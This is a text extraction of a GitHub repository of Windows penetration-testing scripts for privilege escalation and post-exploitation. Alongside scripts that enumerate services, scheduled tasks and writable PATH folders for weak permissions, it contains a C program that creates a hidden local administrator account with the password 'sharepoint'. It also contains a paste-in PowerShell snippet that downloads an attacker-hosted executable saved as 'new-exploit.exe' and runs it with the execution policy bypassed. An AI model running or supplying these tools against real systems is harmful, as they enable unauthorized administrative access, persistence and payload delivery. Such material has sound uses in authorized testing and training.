Full Code of ankh2054/windows-pentest for AI

master abc51e0b58de cached
7 files
7.7 KB
2.3k tokens
1 symbols
1 requests
Download .txt 
Repository: ankh2054/windows-pentest
Branch: master
Commit: abc51e0b58de
Files: 7
Total size: 7.7 KB

Directory structure:
gitextract__chh5jcc/

├── Powershell/
│   ├── folderperms.ps1
│   └── powershell_download_file.txt
├── README.md
├── adducer.c
├── icacls.bat
├── schcheck.bat
└── wmic-info

================================================
FILE CONTENTS
================================================

================================================
FILE: Powershell/folderperms.ps1
================================================
# Author : Parvez Anwar (@parvezghh)
# Date   : 17/11/13
#
# powershell.exe -executionpolicy bypass -file folderperm.ps1


$numofpaths  = 0
$countcopies = 0
$filetocopy  = "testfile.txt"


$myarray = (gi env:path).value.split(';')

Write-Host "" 
Write-Host "[i] Number of folder paths :" $myarray.count

# If the last path entry ends in semi-colon

if ($myarray[$myarray.count-1] -eq "")
{
   $numofpaths = $myarray.count - 2
}
else
{
   $numofpaths = $myarray.count - 1
}

New-Item $filetocopy -type file | Out-Null

$FileExists = (Test-Path $filetocopy)

if (!($FileExists)) 
{
    Write-Host "[i] Dummy test file used to test access was not outputted:" $filetocopy
    exit
}

Write-Host "[i] Copying and removing test file to path folders where access is granted"

for($i=0; $i -le $numofpaths; $i++)
{
 if (Test-Path -Path $myarray[$i])
 {
    Copy-Item $filetocopy $myarray[$i] -errorAction SilentlyContinue -errorVariable errors

    if ($errors.count -le 0)
    {
        Write-Host -foregroundColor Green "      Access granted:" $myarray[$i] 
        $countcopies = $countcopies + 1
        $filetoremove = $myarray[$i] + "\" + $filetocopy
        Remove-Item $filetoremove
    }
    else
    {
       Write-Host -foregroundColor Red "      Access denied :" $myarray[$i] 
    }
 }
 else
 {
    Write-Host -foregroundColor Blue "      Folder missing:" $myarray[$i] 
 }

}

Remove-Item $filetocopy 




================================================
FILE: Powershell/powershell_download_file.txt
================================================
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://10.11.0.36/sbd.exe" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1


================================================
FILE: README.md
================================================
# windows-pentest
Windows Pentest Scripts and Tools.


#### wmic-info - Retrieve system info.
Uses WMIC to gather various important informatoon about a windows host and dump it to HTML.

#### icacls.bat - Weak permissions on Services.
* Script that queries all services. 
* Removes default tasks and any Microsot related. 
* Then checks the  BINARY_PATHS for any exeuctables that have the Everyone or Usergroup set with RW access.

#### schcheck.bat - Weak permissions on scheduled task executables.
* Lists all schededuled tasks. 
* Runs list of executables against icacls and checks if any allow Everyone RW permissions.

#### adduser.c - Creates user and adds to administrator group.
* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. 
* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c 


#### Powershell/powershell_download_file.txt - Create wget powershell script to download external files.

* Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard`
* Paste into Windows command prompt which will create a **wget.ps1**
* `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`

#### Privelege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe
##### Identify the level of access a particular user or groups have to files, directories, Registry keys.

When executing any of the sysinternals tools for the first time the user will be presented with a GUI
pop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag
to automatically accept the EULA.

     accesschk.exe /accepteula 

The following command reports the accesses that the Power Users account has to files and directories in \Windows\System32:

     accesschk "power users" c:\windows\system32

This command shows which Windows services members of the Users group have write access to:

     accesschk users -cw *

Check what access authenticated users have to services.

     accesschk.exe -uwcqv "Authenticated Users" *

Check which Windows services a user called adam.dale has write access to:

      accesschk.exe -uwcqv adam.dale *

Check to see what access permissions are set on the serice called NetLogon

     accesschk.exe -ucqv NetLogon

Find all weak folder permissions per drive.

     accesschk.exe -uwdqs Users c:\
     accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive.

     accesschk.exe -uwqs Users c:\*.*
     accesschk.exe -uwqs "Authenticated Users" c:\*.*


To see what Registry keys under HKLM\CurrentUser a specific account has no access to:

     accesschk -kns austin\mruss hklm\software

To see the security on the HKLM\Software key:

     accesschk -k hklm\software

To see all files under \Users\Mark on Vista that have an explicit integrity level:

     accesschk -e -s c:\users\mark

To see all global objects that Everyone can modify:

     accesschk -wuo everyone \basednamedobjects

#### Powershell/folderperms.ps1
##### Checks for folders in the current PATH variable that are writeable for all authenticated users.

When new folders are created in the root it is writeable for all authenticated users by default. The “NT AUTHORITY\Authenticated Users:(I)(M)” gets added to the folder where M stands for modify access. So any application that gets installed on the root can be tampered with by a non-admin user. 

The script checks for any of those folders that are writeable by authenticated users.


================================================
FILE: adducer.c
================================================
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
/* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. */
/* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c */
int main () {
int i;
i=system ("net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add"); return 0;
}


================================================
FILE: icacls.bat
================================================
@echo off
REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access.
REM Type: Incorrect file permissions
REM Note: The ^ characters escapes certain characters that brerak the FOR loop.
REM Note: tokens=1* - The value at the first delimeter and everything after. 
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
    for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
        for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
            icacls "%%~x"
        )
    )
)


================================================
FILE: schcheck.bat
================================================
@echo off
REM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions.
REM - Note: At present the script only ECHO's tasks.
for /f  "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do (
	for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do (
	ECHO %%~x REM  > results.txt
	)
 )


================================================
FILE: wmic-info
================================================
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
Download .txt 
gitextract__chh5jcc/

├── Powershell/
│   ├── folderperms.ps1
│   └── powershell_download_file.txt
├── README.md
├── adducer.c
├── icacls.bat
├── schcheck.bat
└── wmic-info
Download .txt 
SYMBOL INDEX (1 symbols across 1 files)

FILE: adducer.c
  function main (line 4) | int main () {
Download .json
Condensed preview — 7 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (9K chars). 
[
  {
    "path": "Powershell/folderperms.ps1",
    "chars": 1409,
    "preview": "# Author : Parvez Anwar (@parvezghh)\n# Date   : 17/11/13\n#\n# powershell.exe -executionpolicy bypass -file folderperm.ps1"
  },
  {
    "path": "Powershell/powershell_download_file.txt",
    "chars": 243,
    "preview": "echo $storageDir = $pwd > wget.ps1\necho $webclient = New-Object System.Net.WebClient >>wget.ps1 \necho $url = \"http://10."
  },
  {
    "path": "README.md",
    "chars": 3545,
    "preview": "# windows-pentest\nWindows Pentest Scripts and Tools.\n\n\n#### wmic-info - Retrieve system info.\nUses WMIC to gather variou"
  },
  {
    "path": "adducer.c",
    "chars": 370,
    "preview": "#include <stdlib.h> /* system, NULL, EXIT_FAILURE */\n/* Creates a user called sharepoint with password sharepoint. Add's"
  },
  {
    "path": "icacls.bat",
    "chars": 660,
    "preview": "@echo off\nREM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW"
  },
  {
    "path": "schcheck.bat",
    "chars": 457,
    "preview": "@echo off\nREM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW"
  },
  {
    "path": "wmic-info",
    "chars": 1213,
    "preview": "for /f \"delims=\" %%A in ('dir /s /b %WINDIR%\\system32\\*htable.xsl') do set \"var=%%A\"\n\nwmic process get CSName,Descriptio"
  }
]

About this extraction

This page contains the full source code of the ankh2054/windows-pentest GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 7 files (7.7 KB), approximately 2.3k tokens, and a symbol index with 1 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Extract another repo
Copied to clipboard!